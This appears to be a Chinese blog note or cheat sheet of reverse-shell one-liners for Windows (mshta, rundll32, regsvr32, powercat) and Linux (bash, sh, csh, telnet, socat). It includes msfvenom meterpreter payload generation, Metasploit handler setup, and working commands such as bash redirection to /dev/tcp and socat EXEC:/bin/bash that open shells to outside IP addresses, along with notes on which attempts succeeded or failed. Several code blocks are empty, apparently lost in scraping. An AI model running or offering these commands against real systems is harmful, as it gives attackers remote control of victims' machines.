引子
以你现在的速度你只能逗留原地。如果你要抵达另一个地方,你必须以双倍于现在的速度奔跑。
思维导图和教程
一句话反弹shell&Reverse Shell In Windows
windows
mshta.exe
成功的操作
1 |
|
失败的操作
设置payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.19.19 LPORT=53 -f raw > shellcode.bin
cat shellcode.bin | base64 -w 0 > out.txt
将shellcode.bin base64编码
1 |
|
handler -H 10.100.19.19 -P 53 -p windows/meterpreter/reverse_tcp
mshta.exe http://10.100.19.19/CACTUSTORCH.hta
易错点
handler不能设置为exploit/multi/handler
rundll.exe
use windows/smb/smb_delivery
set srvhost 192.168.123.123
rundll32.exe \192.168.1.109\vabFG\test.dll,0
Regsvr32.exe
1 |
|
powershell & powercat
nc -lnvp 4455
1 |
|
linux
bash
bash tcp
nc -lnvp 4456 bash -i >& /dev/tcp/18.166.7.104/4456 0>&1
bash2 (失败)
1 |
|
bash udp(失败)
nc -lnvp 4457 sh -i >& /dev/udp/18.166.7.104/4457 0>&1
sh
victim:
sh -i >& /dev/udp/192.168.3.253/4242 0>&1
Centos7:
csh -i >& /dev/udp/192.168.3.253/4242 0>&1
telnet
建立连接
1 |
|
反弹shell
1 |
|
socat
建立连接
目标机器监听: socat TCP4-listen:4433 STDOUT
本地连接目标机器: socat - TCP4:18.166.7.104:4433
反弹shell
vps(18.166.7.104)上监听: socat -d -d TCP4-LISTEN:4434 STDOUT
本地kali将shell发送到vps (内网机器运行)socat TCP4:18.166.7.104:4434 EXEC:/bin/bash
反弹shell 二
1 |
|
参考资料
https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/
https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/